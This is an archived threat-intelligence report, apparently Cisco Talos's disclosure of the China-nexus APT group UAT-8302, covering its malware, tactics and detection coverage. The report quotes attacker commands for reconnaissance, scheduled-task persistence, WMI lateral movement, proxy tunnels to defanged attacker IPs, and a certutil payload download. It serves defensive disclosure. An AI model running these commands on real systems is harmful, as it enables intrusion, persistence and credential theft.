{
	"id": "474967b4-4232-436d-addf-73d1859e6473",
	"created_at": "2026-05-07T02:43:38.252551Z",
	"updated_at": "2026-05-07T02:44:10.914002Z",
	"deleted_at": null,
	"sha1_hash": "9c822f6005a986f77601350ad62f5a72645582b6",
	"title": "UAT-8302 and its box full of malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 734359,
	"plain_text": "UAT-8302 and its box full of malware\r\nBy Jungsoo An\r\nPublished: 2026-05-05 · Archived: 2026-05-07 02:00:20 UTC\r\nTuesday, May 5, 2026 06:00\r\nCisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group\r\ntargeting government entities in South America since at least late 2024 and government agencies in\r\nsoutheastern Europe in 2025.\r\nAfter successful compromises, UAT-8302 deploys multiple custom-made malware families that have\r\npreviously been used by other known China-nexus threat actors.\r\nTalos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the\r\nFinalDraft/SquidDoor malware family developed and operated by Jewelbug/REF7707/CL-STA-0049/LongNosedGoblin, a cluster of China-nexus APT actors.\r\nFurthermore, UAT-8302 also uses an updated version of the CloudSorcerer backdoor, a malware family\r\nused in attacks against Russian government entities in 2024.\r\nUAT-8302 also used VSHELL and its SNOWLIGHT stager in their operations, along with a new Rust-based stager that we track as SNOWRUST.\r\nTalos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group\r\ntasked primarily with obtaining and maintaining long-term access to government and related entities around the\r\nworld.\r\nPost-compromise activity consisted of information collection, credential extraction, and proliferation using open-source tooling such as Impacket, proxying tools, and custom-built malware.\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 1 of 14\n\nMalware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a\r\nclose operating relationship between them at the very least. 
Overall, the various malicious artifacts deployed by\r\nUAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have\r\nbeen assessed as China-nexus or Chinese-speaking by various third-party industry reports.\r\nFor instance, NetDraft, a .NET-based malware family deployed by UAT-8302 in South America, was also\r\ndisclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as LongNosedGoblin. ESET assesses\r\nthat LongNosedGoblin used NosyDoor/NetDraft and other custom-made malware to target government\r\norganizations in Southeast Asia and Japan. Furthermore, as per Solar’s reporting, NetDraft was also deployed\r\nagainst Russian IT organizations in 2024 by Erudite Mogwai (LuckyStrike Agent).\r\nNetDraft is likely a .NET-ported variant of the FinalDraft/SquidDoor malware family developed and operated\r\nexclusively by Jewelbug/REF7707/CL-STA-0049 — another cluster of China-nexus APT actors.\r\nAnother malware family deployed by UAT-8302 is CloudSorcerer (version 3). Kaspersky disclosed that\r\nCloudSorcerer was used in attacks directed against Russian government entities in 2024.\r\nFurthermore, two other malware families, SNAPPYBEE/DeedRAT and ZingDoor, were deployed by UAT-8302 in\r\nconjunction with each other, a tactic also highlighted by Trend Micro in 2024.\r\nTalos’ analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs:\r\nDraculoader: A generic shellcode loader deployed by UAT-8302, also used by the Earth Estries and Earth\r\nNaga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere.\r\nSNOWLIGHT: A generic stager for the VSHELL malware family, used by UAT-8302. Also used by UAT-6382, who exploited a Cityworks zero-day (CVE-2025-0994) to deploy VSHELL. 
SNOWLIGHT has also\r\nbeen seen in intrusions attributed to other China-nexus APT clusters, such as UNC5174 and UNC6586.\r\nThe various connections between UAT-8302 and other China-nexus or Chinese-speaking threat actors can be\r\nvisualized as:\r\nFigure 1. UAT-8302's interconnections.\r\nInitial compromise and reconnaissance\r\nUAT-8302's tooling overlaps with various APT groups that have been known to exploit both zero-day and n-day\r\nexploits to obtain initial access. We assess that UAT-8302 follows the same paradigm of obtaining initial access to\r\nits victims.\r\nOnce initial access is obtained, UAT-8302 conducts preliminary reconnaissance using red-teaming tools such as\r\nImpacket:\r\nOther reconnaissance commands may be:\r\nipconfig /all\r\ncertutil -user -store My\r\ncertutil -user -store CA\r\ncertutil -user -store Root\r\nwhoami\r\nnslookup www[.]google[.]com\r\nnet use\r\ncmd.exe /c net view /domain\r\ncmd.exe /c systeminfo\r\ncmd.exe /c net time /domain\r\ncmd.exe /c nslookup -type=SRV _ldap._tcp\r\nnet group \u003cname\u003e /domain\r\nOne of UAT-8302's primary goals is to proliferate within the compromised network, and therefore, the actor\r\nconducts extensive reconnaissance on every endpoint that they can access. 
This extended recon is usually scripted\r\nusing a custom-made PowerShell script such as “whatpc.ps1”:\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\Windows\\Temp\\whatpc.ps1\r\nThe script may be persisted to collect system information via a scheduled task:\r\ncmd.exe /c schtasks /create /tn 'ReconLiteDebug' /tr 'powershell -ExecutionPolicy Bypass -WindowStyle\r\ncmd.exe /c schtasks /create /tn 'RunWhatPC' /tr 'c:\\windows\\temp\\run.bat' /sc ONCE /st 23:28 /ru SYST\r\nThis script executes the following commands on the systems to identify them:\r\nwhoami\r\nwhoami.exe /groups\r\nwhoami.exe /priv\r\nnet.exe user\r\nnet.exe localgroup\r\nnet.exe localgroup administrators\r\nipconfig.exe /all\r\nARP.EXE -a\r\nROUTE.EXE print\r\nNETSTAT.EXE -ano\r\ncmd.exe /c net share\r\ncmd.exe /c wmic startup get caption,command 2\u003e\u00261\r\nnltest.exe /dclist:\u003cdomain\u003e\r\nnet.exe user /domain\r\nnet.exe group /domain\r\nnet.exe group Domain Admins /domain\r\nnltest.exe /domain_trusts\r\nUAT-8302 also performs ping sweeps of the network to discover more endpoints to proliferate into:\r\nC:/Windows/Temp/ping_scan.bat\r\nC:/Windows/Temp/run_scan.bat\r\nC:/Windows/Temp/nbtscan.exe\r\ncmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= \u0026\u0026 echo 192.168.1\r\nUAT-8302 also discovers SMB shares in the network to find reachable remote shares:\r\ncmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\\\192.168.1.%i\\IPC$ \u003enul 2\u003e\u00261 \u0026\u0026 echo 192.168.1.%i\r\nScanning tools\r\nUAT-8302 may also download and run “gogo,” a Go-based, open-source automated network scanning\r\nengine written in Simplified Chinese:\r\ncurl -fsSL hxxps://github[.]com/chainreactors/gogo/releases/download/v2.14.0/gogo_windows_amd64.exe -\r\nAdditionally, UAT-8302 uses a variety of scanning tools such as QScan, naabu, dddd, PortQry and httpx 
to\r\ndiscover services in the network:\r\nhttpx.exe -sc -title -location -f -td -r 192.168.1.1/16\r\nhttpx.exe -sc -title -location -td -r 192.168.1.1/16 -o web.txt\r\nhttpx.exe -sc -title -location -td -u 192.168.1.1/16 -o web.txt\r\nInformation collection\r\nUAT-8302 collects a variety of information about the environment that they are operating within, including Active\r\nDirectory (AD) information and credentials, using open-source tooling such as:\r\nadconnectdump.py\r\nA Python-based tool for Azure AD Connect/Entra ID Connect credential extraction:\r\npython.exe adconnectdump.py\r\nUAT-8302 may also directly query the AD user and computer objects to obtain information from them via\r\nPowerShell:\r\npowershell -command Get-ADUser -Filter * -Property * | Select-Object Name, Displayname, LastLogonDate\r\npowershell -command Get-ADUser -Filter * -Property * | Select-Object SamAccountName, DisplayName, Ena\r\npowershell -Command Get-ADComputer -Filter * -Property Name,DNSHostName,OperatingSystem,Description\r\npowershell -Command Get-ADGroup -Filter * -Properties Members, Description | Select-Object Name, Desc\r\nSpecific AD users of interest may also be queried using system tools such as dsmod and dsquery.\r\nLog collection\r\nUAT-8302 also collects event log information and the logs themselves on multiple endpoints. 
Logs are an\r\nexcellent source for obtaining information and understanding the security configurations and policies applied within a\r\ntarget’s environment:\r\npowershell -Command Get-WinEvent -ListLog Security | Format-List LogName, FileSize, LogMode, MaximumS\r\npowershell -command Get-EventLog -LogName System -Source NETLOGON -Newest 5000 | Where-Object { $_.Me\r\npowershell -Command chcp 437 \u003e$null; Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4768\r\nAudit policies are also queried extensively to obtain system logging configurations:\r\nauditpol /get /category:Logon/Logoff\r\nauditpol /get /category:*\r\nUAT-8302 also collects AD snapshots using tools such as the AD Explorer tool:\r\nae.exe -snapshot c:\\windows\\temp\\result.dat /accepteula\r\ncmd.exe /C 7zr.exe a -mx=5 c:\\windows\\temp\\r.7z c:\\windows\\temp\\result.dat\r\nUAT-8302 also uses a tool written in Simplified Chinese called “SharpGetUserLoginIPRP” — derived from\r\nanother Chinese-language repository — which is used to extract login information from a domain controller:\r\nC:\\ProgramData\\S.exe user:pass@IP -day\r\nProliferation through the network\r\nUAT-8302 proliferates across various endpoints by using either Impacket- or WMI-based remote\r\nprocess creation:\r\ncmd.exe /C wmic /node:IP process call create cmd.exe /c c:\\programdata\\e1.bat\r\ncmd.exe /C schtasks /S IP /U username /P passwd /create /tn 'Runbat' /tr 'c:\\windows\\temp\\run.bat' /s\r\nThese BAT files are meant to execute the accompanying malware on the target systems.\r\nFurthermore, UAT-8302 may also extract login credentials from MobaXterm, a multi-functional and tabbed SSH\r\nclient, using tools such as MobaXtermDecryptor to pivot to other endpoints.\r\nCustom-made malware deployment\r\nUAT-8302 deploys a variety of malware families in their intrusions including NetDraft, CloudSorcerer version 3,\r\nand 
VSHELL.\r\nNetDraft\r\nNetDraft, also known as NosyDoor, is a .NET variant of the FINALDRAFT malware. FINALDRAFT or\r\nSquidoor is a malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049, a cluster\r\nof China-nexus APT actors. FINALDRAFT uses legitimate services such as MS Graph to act as command-and-control servers (C2s) to execute commands and payloads on the compromised system. Similarly, NetDraft relies\r\non the MS Graph API to communicate with its OneDrive-based C2. NetDraft is deployed using the following\r\nmechanism:\r\nA benign executable is used to side-load a malicious dynamic-link library (DLL) based loader.\r\nThe loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the\r\nexisting process.\r\nNetDraft also contains an embedded, .NET-based helper library. The library is compressed and embedded\r\nusing the Fody/Costura framework. During runtime, the library is decompressed and instrumented to carry\r\nout operations on the endpoint on behalf of NetDraft. We track this library as “FringePorch.”\r\nFigure 2. 
NetDraft and FringePorch infection chain.\r\nNetDraft and FringePorch support the following functionalities:\r\nExecute arbitrary commands on the endpoint\r\nExecute a .NET-based assembly sent by the C2 within NetDraft’s process context\r\nExit and stop execution\r\nUpload files to C2\r\nDownload files from specified remote locations to local disks\r\nFile management: Change current working directory, rename files, enumerate files, and set write times\r\nSleep\r\nExecute a .NET plugin: This functionality is similar to its ability to run arbitrary .NET-based assemblies.\r\nHere, the implant runs a provided plugin’s “Plugin.Run” function.\r\nSince NetDraft lacks the capability to persist across reboots and relogins, one of the first commands the C2\r\nissues to it is the creation of a malicious scheduled task:\r\nschtasks /create /ru system /tn Microsoft\\Windows\\Maps\\{a086ff1e-d6dc-45f7-b3e4-6udknw82sa} /sc hourl\r\nCloudSorcerer v3\r\nAnother malware UAT-8302 deploys is the latest version of the CloudSorcerer backdoor (version 3). The malware\r\nconsists of the side-loading triad of files: a benign executable, a malicious DLL-based loader, and the actual\r\nimplant in a data file:\r\nYandex.exe -r -p:test.ini -s:12\r\nVMtools.exe -r -p:VM.ini -s:12\r\nThe executables will side-load a DLL named “mspdb60[.]dll”, which will load and decrypt the “.ini” file specified\r\nin the command line — such as “test.ini” or “vm.ini”. The decrypted shellcode is then injected into a combination\r\nof specified benign processes.\r\nCloudSorcerer v3 – The decrypted shellcode\r\nThe decrypted INI file is a newer version (v3) of the CloudSorcerer backdoor that Kaspersky disclosed in 2024. 
Depending on the\r\nprocess name (where it may have been initiated or injected), CloudSorcerer v3 will perform one of the following\r\nactions:\r\nIf the process is named “dpapimig.exe”, then it will gather system information, inject itself into\r\nexplorer.exe, and receive command codes from the C2 via a named pipe, gather disk information,\r\nenumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.) and\r\nexecute shellcode received via the named pipe.\r\nIf the process is named “spoolsv.exe”, then it will contact GitHub to obtain C2 information and receive\r\ncommands from the C2.\r\nIf the process is named “mspaint.exe”, “browser”, or anything else, it will proceed to inject itself into\r\ndpapimig.exe, spoolsv.exe, etc. to kick off its malicious operations.\r\nThe system information CloudSorcerer v3 collects includes computer name, username and local system time.\r\nObtaining C2 information\r\nLike CloudSorcerer v2, version 3 contacts a legitimate service to obtain the C2 information. The malware will\r\neither contact a specific GitHub repository to read a data blob, or read a GameSpot profile the threat actors set up.\r\nThe data blob is decoded to obtain the C2 information, which can exist in one of the following formats\r\ndepending on the variant of the CloudSorcerer backdoor:\r\nA C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication\r\nwith the C2 to carry out malicious operations\r\nAn access token to a legitimate service (such as OneDrive or Dropbox) that UAT-8302 uses to act as its C2\r\ninfrastructure to obtain next-stage payloads and commands\r\nVSHELL, SNOWLIGHT and SNOWRUST\r\nIn other instances, UAT-8302 deploys the VSHELL malware via a slightly different triad of artifacts for side-loading malware. 
The benign executable side-loads a malicious DLL named “wininet[.]dll” that reads a BIN file\r\nand injects it into “explorer[.]exe”.\r\nThe payload is position-independent shellcode that is injected into explorer[.]exe. The payload is a stager for the\r\nVSHELL malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded\r\npayload is a garbled version of VSHELL.\r\nIt is worth noting that Talos observed the same single-byte key and stager being used by UAT-6382 to deliver\r\nVSHELL malware in early 2025. Further investigation revealed that this stager is in fact SNOWLIGHT, a\r\nlightweight downloader that can download and deploy a next-stage payload. UNC5174 has been observed using\r\nSNOWLIGHT to download Sliver and VSHELL. UNC5174 is a suspected China-nexus threat actor that typically\r\nexploits zero-day and n-day vulnerabilities to gain access to critical infrastructure organizations in the Americas.\r\nTalos discovered that UAT-8302 also used a Rust-based variant of SNOWLIGHT that we track as “SNOWRUST.”\r\nSNOWRUST is based on the LexiCrypt Rust-based shellcode obfuscator. SNOWRUST simply decodes the\r\nembedded SNOWLIGHT shellcode and executes it to download the XOR-encoded final payload, VSHELL,\r\nreceived from the C2.\r\nIn one intrusion, UAT-8302 used VSHELL to deploy a native driver from the Hades HIDS/HIPS software — an\r\nopen-source Windows host monitoring kernel framework written in Simplified Chinese. The driver was\r\nspecifically the System Monitoring filter driver that lets Hades register callbacks for process, thread, registry, and\r\nfile events. This allows the driver to monitor the system and potentially allow, block, or hide events and artifacts.\r\nThe SNAPPYBEE/DeedRAT and ZingDoor combo\r\nIn one instance, UAT-8302 first deployed a RAT family known as DeedRAT/SNAPPYBEE. 
However, UAT-8302\r\nalmost immediately switched over to a DLL-based malware family known as ZingDoor, first disclosed by Trend\r\nMicro in 2023, which has attributed both DeedRAT and ZingDoor to the China-nexus threat actor Earth Estries.\r\nZingDoor has also been deployed after the successful exploitation of ToolShell in 2025 by China-nexus threat\r\nactors.\r\nIn parallel, UAT-8302 also deployed Draculoader, a generic shellcode loader, also used by the Earth Estries and\r\nEarth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere:\r\nC:\\Documents and Settings\\All Users\\Microsoft\\Crypto\\RSA\\d3d8.dll\r\nSetting up additional means of backdoor access\r\nOnce UAT-8302 deploys their custom-made malware, they begin establishing other means of backdoor access.\r\nOne of the techniques used is setting up proxy servers on infected systems to tunnel traffic outside the enterprise\r\nto the infected hosts using tools such as Stowaway (another tool written in Simplified Chinese):\r\nc:\\windows\\system32\\wagent.exe -c 85[.]209[.]156[.]3:56456\r\ncmd.exe /c (echo @echo off \u0026\u0026 start c:\\windows\\temp\\mmc.exe -l 85[.]209[.]156[.]3:56456 -s \u003cpass\u003e \u0026\u0026\r\nag531.exe -c 45[.]135[.]135[.]100:443 -s \u003cblah\u003e -f AgreedUponByAllParties\r\nUAT-8302 may use other tools such as anyproxy to set up proxies within the infected enterprise’s network:\r\nc:\\users\\public\\any.exe\r\nFurthermore, we observed UAT-8302 deploying the SoftEther VPN clients as well:\r\ncertutil -urlcache -split -f hxxp://38[.]54[.]32[.]244/Rar.exe rar.exe\r\nrar.exe x glb.rar\r\nCommunicator.exe /usermode\r\nCoverage\r\nThe following ClamAV signatures detect and block this 
threat:\r\nWin.Loader.CloudSorcerer-10059633-0\r\nWin.Loader.CloudSorcerer-10059634-0\r\nWin.Malware.CloudSorcerer-10059635-0\r\nWin.Tool.dddd-10059636-2\r\nWin.Tool.dddd-10059637-0\r\nWin.Loader.Donut-10059638-0\r\nWin.Loader.Draculoader-10059639-0\r\nWin.Tool.gogo-10059640-0\r\nWin.Tool.gogo-10059641-0\r\nPs1.Tool.Microburst-10059642-0\r\nWin.Tool.Mobaxtermdecryptor-10059643-0\r\nWin.Malware.Netdraft-10059644-0\r\nWin.Malware.Netdraft-10059645-0\r\nWin.Malware.Netdraft-10059646-0\r\nWin.Malware.Netdraft-10059647-0\r\nWin.Malware.Snappybee-10059648-0\r\nWin.Malware.Snappybee-10059649-0\r\nWin.Malware.Snappybee-10059650-0\r\nWin.Malware.Snappybee-10059651-0\r\nWin.Malware.Snappybee-10059652-0\r\nWin.Malware.Snappybee-10059653-0\r\nWin.Malware.Snowrust-10059654-0\r\nWin.Malware.Agent-10059655-0\r\nWin.Malware.Stowaway-10059656-0\r\nWin.Malware.Stowaway-10059657-0\r\nWin.Loader.Agent-10059658-0\r\nWin.Malware.Agent-10059659-0\r\nWin.Malware.Agent-10059660-0\r\nWin.Loader.Agent-10059661-1\r\nWin.Malware.Agent-10059662-0\r\nThe following Snort Rules (SIDs) detect and block this threat:\r\n66055, 66054, 301437, 301436, 301435, 301434, 301433, 301432, 301431\r\n66052, 66053, 66050, 66051, 66048, 66049, 66046, 66047, 66044, 66045, 66042, 66043, 66040, 66041\r\nIndicators of compromise (IOCs)\r\nIOCs for this threat are also available on our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/uat-8302/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-8302/"
	],
	"report_names": [
		"uat-8302"
	],
	"threat_actors": [],
	"ts_created_at": 1778121818,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c822f6005a986f77601350ad62f5a72645582b6.pdf",
		"text": "https://archive.orkl.eu/9c822f6005a986f77601350ad62f5a72645582b6.txt",
		"img": "https://archive.orkl.eu/9c822f6005a986f77601350ad62f5a72645582b6.jpg"
	}
}